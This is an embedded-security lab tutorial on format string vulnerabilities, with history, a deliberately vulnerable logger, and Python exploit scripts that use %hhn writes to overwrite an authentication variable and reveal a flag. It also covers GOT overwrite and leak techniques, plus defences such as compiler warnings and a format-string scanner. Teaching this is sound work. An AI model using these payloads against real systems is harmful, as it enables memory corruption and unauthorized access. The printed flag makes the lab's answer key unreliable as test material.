Lab 02: Format String Vulnerability
Introduction
Format string vulnerabilities are a distinctive class of memory corruption bug that shocked the security community when they were widely publicized in 2000. Buffer overflows corrupt memory sequentially from the end of a buffer. Format string bugs are different: they give surgical precision for reading and writing arbitrary memory.
Difficulty: Medium
Category: Memory Corruption
Historical Context: WU-FTPD 2.6.0 (June 2000)
Learning Objectives
By completing this lab, you will:
- Understand how printf format strings work internally
- Master format string exploitation techniques
- Learn to read and write arbitrary memory
- Develop precision memory corruption skills
- Appreciate secure coding practices for output functions
Historical Background
The WU-FTPD Discovery (2000)
In June 2000, a researcher known as "tf8" posted about a critical vulnerability in WU-FTPD 2.6.0, one of the most popular FTP servers of the time. The bug was deceptively simple: text supplied through the SITE EXEC command reached a printf-style function (lreply) as its format string.
This discovery revealed an entire class of vulnerabilities hiding in plain sight. Within weeks, format string bugs were found in:
- Linux rpc.statd (disclosed July 2000, later exploited by the Ramen worm in 2001)
- Various telnetd implementations
- Logging daemons across platforms
- Embedded device interfaces
Why Format Strings Shocked Security Researchers
- Ubiquitous: printf-family functions are everywhere
- Powerful: read and write memory without overflowing any buffer
- Subtle: easy to introduce, hard to spot
- Precise: byte-level memory manipulation
Vulnerability Overview
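How Printf Works
The printf function copies its format string to the output, replacing each format specifier with the next argument, interpreted as that specifier directs. For example, `printf("%d items for %s\n", count, name);` prints `count` as a decimal integer and `name` as a string. Common specifiers:
- %d - integer from the next argument
- %x - hexadecimal from the next argument
- %s - string read from the pointer in the next argument
- %n - writes the number of bytes printed so far to the address in the next argument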
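The Vulnerability
When the user controls the format string, as in `printf(user_input);`, printf receives no arguments after it, yet it still fetches one for every specifier it finds. The attacker therefore controls how printf interprets whatever occupies the argument registers and the stack:
- %x - read stack values
- %s - read from arbitrary addresses (by placing an address where printf expects a pointer)
- %n - write to arbitrary addresses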
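To make the stack walk concrete, here is a toy Python model. It is not how printf is implemented; it assumes each %x simply reads the next 32-bit argument slot, whatever the caller left there. The slot values are borrowed from the Step 3 transcript in this lab, and `vulnerable_log` is a hypothetical name.

```python
import re


def vulnerable_log(user_input, arg_slots):
    """Toy model of printf(user_input) called with no extra arguments.

    Assumption for illustration: every %x consumes the next 32-bit argument
    slot (register or stack word), whether or not the caller filled it.
    """
    slots = iter(arg_slots)
    return re.sub(r'%x', lambda m: format(next(slots), 'x'), user_input)


# Words that occupied the argument slots in the Step 3 transcript
slots = [0x20000800, 0xDEADBEEF, 0x64, 0x20000810, 0x0, 0x41414141]
print(vulnerable_log('%x %x %x', slots))  # 20000800 deadbeef 64
```

Text without specifiers passes through unchanged; each %x added to the input reveals one more word.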
Lab Setup
Prerequisites
- Completed Lab 01 (Buffer Overflow)
- Understanding of printf internals
- Python 3 with pwntools recommended
Getting Started
- Build and flash the vulnerable binary.
- Connect to the target.
- Explore the application.
Understanding the Target
Application Overview
The system is an "activity logger" with:
- Logging Function: Vulnerable printf call
- Authentication Check: Requires specific value in memory
- Debug Hints: Shows important addresses
- Stack Canary: Monitors for corruption
The Vulnerable Code
```c
void log_activity(char *user_input)
{
    embsec_printf("Activity logged: ");
    embsec_printf(user_input); // FORMAT STRING BUG!
    embsec_printf("\n");
}
```
The Goal
Set the authenticated variable to 0x41414141 to get the flag.
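Vulnerability Analysis
Step 1: Confirm the Vulnerability
Test with format specifiers, for example by logging `%x %x %x %x`. If the log line shows hexadecimal words instead of the literal `%x` text, the input is being parsed as a format string.
Success! We're reading stack values.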
Step 2: Information Gathering
Use option 3 for hints:
```text
=== System Information ===
Stack canary: 0xDEADBEEF (watching for corruption)
Auth variable: 0x20000C00 (current value: 0x00000000)
Auth success value: 0x41414141
```
Critical information:
- Target address: 0x20000C00
- Required value: 0x41414141
- A stack canary is present, but it does not stop this attack: %n writes straight to the target address without touching the canary
Step 3: Find Input Position
Locate our input on the stack:
```text
Enter activity to log: AAAA %x %x %x %x %x %x
Activity logged: AAAA 20000800 deadbeef 64 20000810 0 41414141
```
Our input "AAAA" (0x41414141) is at position 6!
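Finding the position can be scripted. This is a minimal sketch. It assumes the device echoes the marker and the hex words separated by spaces, as in the transcript above. `build_probe` and `find_offset` are hypothetical helpers.

```python
def build_probe(count):
    """Marker followed by `count` %x specifiers, as used in Step 3."""
    return 'AAAA' + ' %x' * count


def find_offset(log_line, marker='AAAA'):
    """Return the 1-based argument position whose value printed as the
    marker's bytes, or None if the probe did not reach it."""
    words = log_line.split()
    if marker not in words:
        return None
    start = words.index(marker)              # the marker is echoed literally
    expected = marker.encode().hex()         # 'AAAA' -> '41414141'
    for position, word in enumerate(words[start + 1:], start=1):
        if word.lower() == expected:
            return position
    return None


probe = build_probe(6)
print(probe)  # AAAA %x %x %x %x %x %x
print(find_offset('Activity logged: AAAA 20000800 deadbeef 64 20000810 0 41414141'))  # 6
```

The marker is four identical bytes, so the little-endian byte order of the printed word does not matter. If the marker is not found, raise the count passed to `build_probe`.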
Step 4: Direct Parameter Access
Verify using direct parameter access: logging `AAAA%6$x` should print `Activity logged: AAAA41414141`.
Perfect! We can reference our input directly.
Format String Techniques
1. Memory Reading
Reading Stack Values:
```text
%x %x %x %x   # Read 4 stack values
%6$x          # Read the 6th parameter directly
%100x         # Read the next value, padded to 100 characters
```
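Reading Arbitrary Memory:
Place an address in the input and use %s to dereference it. On this target every SRAM address (0x2000xxxx) contains a 0x00 byte, and printf stops at the first NUL in the format string, so the address must come after the specifiers.
```python
import struct

addr = 0x20000100
# %7$s is exactly one word (position 6), so the address after it is word 7;
# %s then reads a NUL-terminated string starting at addr
payload = b'%7$s'
payload += struct.pack('<I', addr)
```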
2. Memory Writing
The %n Specifier:
- Writes the number of bytes printed so far
- Takes the address from a stack parameter
- Variants: %n (4 bytes), %hn (2 bytes), %hhn (1 byte)
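Basic Write (writes the value 100 to target_addr; the address goes last because 0x2000xxxx addresses contain a 0x00 byte):
```python
import struct

target_addr = 0x20000C00  # example: the lab's auth variable
payload = b'%100c%9$n'    # print exactly 100 chars, then write 100 via word 9
payload += b'AAA'         # pad to 12 bytes (words 6-8) so the address is word 9
payload += struct.pack('<I', target_addr)
```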
3. Precision Writing
For exact values, use width specifiers. To write 0x41 to a single byte:
```python
import struct

target = 0x20000C00      # example target byte
payload = b'%65c'        # print 65 chars (65 = 0x41)
payload += b'%9$hhn'     # store the low byte of the count via word 9
payload += b'AA'         # pad 10 bytes to 12 (words 6-8)
payload += struct.pack('<I', target)  # word 9
```
Exploitation
Understanding the Target Value
We need to write 0x41414141:
- 4 bytes, each containing 0x41
- Decimal value: 65 ('A' in ASCII)
Exploitation Strategy
Write each byte separately using %hhn:
- Place 4 addresses on stack (target+0, +1, +2, +3)
- Use width specifiers to control bytes printed
- Write 0x41 to each address sequentially
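Building the Exploit
```python
#!/usr/bin/env python3
import struct
import time

import serial  # pyserial

# Target configuration (from option 3's hints)
target_addr = 0x20000C00
target_value = 0x41414141   # all four bytes are 0x41
offset = 6                  # word position of the start of our input (Step 3)

# Serial setup
ser = serial.Serial('/dev/ttyACM0', 115200, timeout=1)


def send_command(cmd):
    ser.write(cmd.encode() + b'\n')
    time.sleep(0.1)


def build_format(first_addr_pos):
    # Print 0x41 (65) characters once, then store that count into each of
    # the four target bytes with %hhn (1-byte writes).
    fmt = f'%{target_value & 0xFF}c'.encode()
    for i in range(4):
        fmt += f'%{first_addr_pos + i}$hhn'.encode()
    # Pad so the addresses that follow start on a 4-byte word boundary
    return fmt + b'A' * (-len(fmt) % 4)


# Every 0x2000xxxx address contains a 0x00 byte and printf stops at the
# first NUL, so the specifiers go first and the addresses last. The first
# address lands at word offset + len(format part) // 4; iterate until the
# position named in the specifiers matches where it actually lands.
pos = offset
while offset + len(build_format(pos)) // 4 != pos:
    pos = offset + len(build_format(pos)) // 4

payload = build_format(pos)
for i in range(4):
    payload += struct.pack('<I', target_addr + i)

# Navigate to log activity and send the exploit
send_command('1')
ser.write(payload + b'\n')

# Check authentication
time.sleep(0.5)
send_command('2')

# Read flag
response = ser.read(2000)
print(response.decode('latin-1'))
```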
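A payload layout is hard to debug on hardware, so a toy model of printf can sanity-check it first. The sketch below rests on several assumptions and is not the lab's embsec_printf. It treats argument word k as `stack_before[k-1]` for k < 6 and the input bytes as words 6, 7, and so on. It supports only %c, %d, %x, %s and %n/%hn/%hhn, and it stops at the first NUL as a real printf does. `simulate_printf` is a hypothetical name. The usage lines check a specifiers-first payload, and they show that an addresses-first payload prints nothing on this target.

```python
import re
import struct

# Optional positional index, width, length modifier, conversion
SPEC = re.compile(rb'%(?:(\d+)\$)?(\d*)(hh|h)?([cdxsn%])')
WRITE_SIZE = {None: 4, b'h': 2, b'hh': 1}


def simulate_printf(payload, stack_before, memory):
    """Toy model of printf(payload); returns the bytes it would print."""
    fmt = payload.split(b'\x00', 1)[0]            # printf stops at the first NUL
    padded = payload + b'\x00' * (-len(payload) % 4)
    words = list(stack_before) + [struct.unpack_from('<I', padded, i)[0]
                                  for i in range(0, len(padded), 4)]
    out, pos, next_arg = bytearray(), 0, 0
    for m in SPEC.finditer(fmt):
        out += fmt[pos:m.start()]
        pos = m.end()
        argno, width, size, conv = m.groups()
        if conv == b'%':
            out += b'%'
            continue
        if argno:
            arg = words[int(argno) - 1]
        else:
            arg, next_arg = words[next_arg], next_arg + 1
        w = int(width) if width else 0
        if conv == b'c':
            out += bytes([arg & 0xFF]).rjust(w)
        elif conv == b'd':
            out += (b'%d' % arg).rjust(w)
        elif conv == b'x':
            out += (b'%x' % arg).rjust(w)
        elif conv == b's':
            s = bytearray()
            while memory.get(arg + len(s), 0):
                s.append(memory[arg + len(s)])
            out += bytes(s).rjust(w)
        else:  # n, hn, hhn: store the count so far at the address
            n = WRITE_SIZE[size]
            count = len(out) & ((1 << (8 * n)) - 1)
            for i in range(n):
                memory[arg + i] = (count >> (8 * i)) & 0xFF
    return bytes(out + fmt[pos:])


TARGET = 0x20000C00
STACK = [0x20000800, 0xDEADBEEF, 0x64, 0x20000810, 0x0]   # words 1-5 (Step 3)
addrs = b''.join(struct.pack('<I', TARGET + i) for i in range(4))

# Specifiers first (32 bytes = words 6-13), addresses last (words 14-17)
memory = {}
simulate_printf(b'%65c%14$hhn%15$hhn%16$hhn%17$hhn' + addrs, STACK, memory)
written = int.from_bytes(bytes(memory.get(TARGET + i, 0) for i in range(4)), 'little')
print(hex(written))  # 0x41414141

# Addresses first: the leading 0x00 byte ends the format string immediately
memory_first = {}
out_first = simulate_printf(addrs + b'%49c%6$hhn%7$hhn%8$hhn%9$hhn', STACK, memory_first)
print(out_first, memory_first)  # b'' {}
```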
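Manual Exploitation Steps
- Calculate addresses: the four target bytes are at 0x20000C00, 0x20000C01, 0x20000C02 and 0x20000C03.
- Build payload: generate it with the script above. It contains non-printable bytes (0x00, 0x0C, 0x01-0x03), so send it from a script or serial tool rather than pasting it into a terminal.
- Execute:
  - Select option 1
  - Send the payload
  - Select option 2
  - Get the flag!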
Expected Result
```text
Choice: 2
ACCESS GRANTED!
Flag: embsec{f0rm4t_str1ng_wr1t3_4cc3ss}
Critical system compromise detected!
```
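Advanced Techniques
1. Large Value Writes
Writing a large value as four %hhn writes, sorted by byte value so each write only needs additional padding:
```python
import struct

target = 0x20000C00          # example target address
value = 0xDEADBEEF

# Little-endian ARM stores 0xdeadbeef as ef be ad de, so the byte for
# target+i is (value >> 8*i) & 0xff. Sort by byte value so the running
# count only has to grow: [(0xad, 2), (0xbe, 1), (0xde, 3), (0xef, 0)]
writes = sorted(((value >> (8 * i)) & 0xFF, i) for i in range(4))


def build_format(first_pos):
    fmt, printed = b'', 0
    for idx, (byte, _) in enumerate(writes):
        if byte > printed:
            fmt += f'%{byte - printed}c'.encode()
            printed = byte
        # The address for this write is the idx-th one placed after the format
        fmt += f'%{first_pos + idx}$hhn'.encode()
    return fmt + b'A' * (-len(fmt) % 4)   # pad to a word boundary


# Addresses go last (they contain 0x00); solve for the word they start at
pos = 6
while 6 + len(build_format(pos)) // 4 != pos:
    pos = 6 + len(build_format(pos)) // 4

payload = build_format(pos)
for _, offset in writes:
    payload += struct.pack('<I', target + offset)
```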
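2. GOT Overwrite
Overwrite Global Offset Table entries on dynamically linked targets. Bare-metal firmware usually has no GOT, but function pointers stored in RAM serve the same purpose.
```python
# Find GOT entry
got_printf = 0x20001234
# Overwrite with shellcode address
shellcode_addr = 0x20000500
# Use format string to overwrite GOT
```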
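3. Stack Pivot
A format string cannot set the stack pointer directly. It can, however, overwrite saved values on the stack, such as a saved frame pointer or return address. When the function epilogue later restores them, execution or the stack moves onto attacker-controlled data.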
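4. Information Disclosure
Leak critical addresses:
```python
import struct

# Leak stack canary (39 is illustrative; the position is target-specific.
# In Step 3, deadbeef, matching this lab's canary value, appeared at position 2)
payload = b'%39$x'
# Leak a saved return address (saved EIP on x86, LR on ARM)
payload = b'%40$x'
# Leak library addresses (bypass ASLR) by dereferencing a GOT entry
got_entry = 0x20001234   # hypothetical GOT entry address
payload = b'%7$s' + struct.pack('<I', got_entry)  # address lands at word 7
```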
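Defensive Measures
Immediate Fixes
- Never use user input as a format string: write `embsec_printf("%s", user_input);` instead of `embsec_printf(user_input);`
- Use string literals as format strings, so the compiler can check each format against its arguments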
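A crude source scan can help find candidates for review. The sketch below is a regex heuristic in Python, not a C parser, and it assumes each call fits on one line. The `FORMAT_ARG` table of format-argument positions is our own assumption, covering a few printf-family functions plus the lab's embsec_printf. Compiler format warnings remain the real check.

```python
import re

# Which argument (0-based) holds the format string, for a few printf-family
# functions; embsec_printf is the lab's own wrapper.
FORMAT_ARG = {'printf': 0, 'embsec_printf': 0, 'fprintf': 1,
              'sprintf': 1, 'snprintf': 2, 'syslog': 1}
CALL = re.compile(r'\b(' + '|'.join(FORMAT_ARG) + r')\s*\((.*)\)\s*;')


def split_args(text):
    """Split a C argument list on top-level commas, ignoring string contents."""
    args, current, depth, in_string, escaped = [], '', 0, False, False
    for ch in text:
        if in_string:
            if escaped:
                escaped = False
            elif ch == '\\':
                escaped = True
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch in '([':
            depth += 1
        elif ch in ')]':
            depth -= 1
        elif ch == ',' and depth == 0:
            args.append(current.strip())
            current = ''
            continue
        current += ch
    args.append(current.strip())
    return args


def flag_nonliteral_formats(source):
    """Return (line, function, argument) for calls whose format is not a literal."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in CALL.finditer(line):
            name, args = match.group(1), split_args(match.group(2))
            index = FORMAT_ARG[name]
            if index < len(args) and not args[index].startswith('"'):
                findings.append((lineno, name, args[index]))
    return findings


sample = '''embsec_printf("Activity logged: ");
embsec_printf(user_input);
embsec_printf("%s", user_input);
snprintf(buf, sizeof(buf), msg);'''
print(flag_nonliteral_formats(sample))
# [(2, 'embsec_printf', 'user_input'), (4, 'snprintf', 'msg')]
```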
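Compiler Protections
Enable format string warnings, for example `-Wformat -Wformat-security` in GCC and Clang. Add `-Werror=format-security` to make them fatal, or `-Wformat-nonliteral` to flag every non-literal format. For a custom wrapper such as embsec_printf, these checks only apply if it is declared with `__attribute__((format(printf, 1, 2)))`, assuming it takes `(const char *fmt, ...)`.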
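Runtime Protections
- FORTIFY_SOURCE: with glibc, building with `-D_FORTIFY_SOURCE=2` and optimization enabled makes printf-family calls abort when %n appears in a format string stored in writable memory. Bare-metal C libraries may not offer an equivalent.
- Stack canaries: limited effectiveness against format strings, because %n writes directly to the target without overwriting the canary
- RELRO (Relocation Read-Only): full RELRO (`-Wl,-z,relro,-z,now`) makes the GOT read-only after startup, blocking GOT overwrites on dynamically linked ELF targets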
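Common Pitfalls
1. Parameter Counting
Problem: Wrong position for direct parameter access
Solution: Test with AAAA and %x to find position
2. Alignment Issues
Problem: Each address must fill a whole 4-byte argument slot; if the bytes before it are not a multiple of 4, it straddles two slots. %n word writes can also fault on cores without unaligned access support (e.g. Cortex-M0).
Solution: Pad the input so every address starts on a 4-byte boundary; byte-sized %hhn writes have no alignment requirement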
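3. Width Calculation
Problem: Incorrect byte counts for %n
Solution: Track every byte printed before each write, including literal text and any address bytes placed ahead of the specifiers; %hhn and %hn store only the low 8 or 16 bits of the count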
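The padding arithmetic is easy to get wrong by hand. Here is one small way to compute it, assuming the stored count wraps modulo 256 for %hhn and modulo 65536 for %hn. `pad_needed` and `width_spec` are hypothetical helper names.

```python
def pad_needed(printed, want, bits=8):
    """Characters to print before a %hhn (bits=8) or %hn (bits=16) write
    so the stored value equals `want`, given `printed` characters so far.
    The count only grows, so wrap around modulo 2**bits when needed."""
    return (want - printed) % (1 << bits)


def width_spec(n):
    # %Nc prints exactly N characters; emit nothing when no padding is needed
    return f'%{n}c' if n else ''


print(pad_needed(16, 0x41))             # 49
print(pad_needed(0xF0, 0x10))           # 32 (wraps past 0xFF)
print(pad_needed(0, 0x4141, bits=16))   # 16705
```

For example, with 16 characters already printed, reaching 0x41 takes 49 more. A target smaller than the current count wraps around: going from 0xF0 to 0x10 takes 0x20 more.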
4. Format String Limits
Problem: Some implementations limit width specifiers
Solution: Use multiple writes or find alternatives
Real-World Impact
Format string bugs in the wild:
Historical Exploits
- 2000: WU-FTPD 2.6.0 remote root
- 2001: Linux rpc.statd (Ramen worm)
- 2002: OpenBSD ftpd
- 2003: Linux kernel vsprintf
Modern Occurrences
- 2012: sudo format string in debug logging (sudo_debug, CVE-2012-0809)
- 2020: Windows Print Spooler
- IoT Devices: Common in embedded systems
- Web Applications: Printf-style template engines
Comparison with Buffer Overflows
| Aspect | Buffer Overflow | Format String |
|---|---|---|
| Discovery | Obvious pattern | Subtle mistake |
| Precision | Sequential corruption | Surgical writes |
| Read Capability | Limited | Extensive |
| Write Capability | Sequential | Arbitrary |
| Bypass Protections | Harder | Often easier |
| Complexity | Lower | Higher |
Key Takeaways
- Format String Power: Read/write anywhere without overflow
- Always Use %s: Never pass user input as format string
- Compiler Warnings: Enable and heed format warnings
- Defense in Depth: Multiple protections needed
- Code Review: Look for printf-family vulnerabilities
Challenges
Challenge 1: Blind Exploitation
No debug output - can you still exploit?
- Use %x to map memory
- Find addresses through leaks
- Brute force if necessary
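For the mapping step, a probe that tags each leaked word with its position keeps replies easy to parse even when the device adds its own text. This sketch works under that assumption. `map_probe` and `parse_map` are hypothetical helpers. Keep each range small enough for the input limit.

```python
import re


def map_probe(first, last):
    """Probe that prints argument words first..last via direct parameter
    access, each zero-padded to 8 hex digits and tagged with its position."""
    return ' '.join(f'{n}:%{n}$08x' for n in range(first, last + 1))


def parse_map(reply):
    """Return {position: word} from a reply to map_probe()."""
    return {int(pos): int(word, 16)
            for pos, word in re.findall(r'(\d+):([0-9a-fA-F]{8})', reply)}


print(map_probe(1, 3))  # 1:%1$08x 2:%2$08x 3:%3$08x
print(parse_map('Activity logged: 1:20000800 2:deadbeef 3:00000064'))
```

Sweeping successive ranges and merging the dictionaries builds a picture of the stack without any debug output.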
Challenge 2: Limited Input Length
Only 32 bytes allowed:
- Use short writes (%hn)
- Multiple exploitation rounds
- Leverage existing values
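Here is a sketch of the short-write idea. Writing 0x41414141 as two %hn writes of 0x4141 (16705) needs only two addresses. The helper `place` is hypothetical. It assumes the input starts at word 6 (Step 3), and that addresses must follow the specifiers because they contain 0x00 bytes. The code compares payload lengths for the two approaches.

```python
import struct

TARGET = 0x20000C00   # auth variable address (option 3 hints)
OFFSET = 6            # word position of the start of the input (Step 3)


def place(format_for, addresses):
    """Specifiers first, then the packed addresses. Solve for the word
    position the first address lands on, which the specifiers must name."""
    pos = OFFSET
    while True:
        fmt = format_for(pos)
        fmt += b'A' * (-len(fmt) % 4)            # pad to a word boundary
        if OFFSET + len(fmt) // 4 == pos:
            return fmt + b''.join(struct.pack('<I', a) for a in addresses)
        pos = OFFSET + len(fmt) // 4


# Four 1-byte writes of 0x41
byte_payload = place(
    lambda p: b'%65c' + b''.join(f'%{p + i}$hhn'.encode() for i in range(4)),
    [TARGET + i for i in range(4)])

# Two 2-byte writes of 0x4141 (16705): half the addresses, shorter specifiers
short_payload = place(
    lambda p: f'%16705c%{p}$hn%{p + 1}$hn'.encode(),
    [TARGET, TARGET + 2])

print(len(byte_payload), len(short_payload))  # 48 28
```

The %hn version fits in 32 bytes. The cost is printing 16,705 characters, which takes about 1.5 seconds at 115200 baud.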
Challenge 3: ASLR Enabled
Randomized addresses:
- Leak base addresses first
- Use relative offsets
- Partial overwrites
Further Reading
Technical Papers
- Exploiting Format String Vulnerabilities - scut/team teso
- Format String Attacks - Modern guide
- Advanced Format String Exploitation
Historical Documents
- tf8's original WU-FTPD advisory
- CERT Advisory CA-2000-13
- Ramen worm analysis
Modern Research
- Format string compiler defenses
- Automated vulnerability detection
- Format string fuzzing techniques
Next Steps
Congratulations on mastering format string exploitation! You've learned:
- How printf processes format specifiers
- Reading arbitrary memory with %x and %s
- Writing arbitrary memory with %n
- Precision memory corruption techniques
- Why format string bugs are dangerous
Consider exploring:
- Advanced ROP techniques
- Heap exploitation methods
- Integer overflow vulnerabilities
- Race conditions in embedded systems
"With great power comes great responsibility" - Always use format strings safely!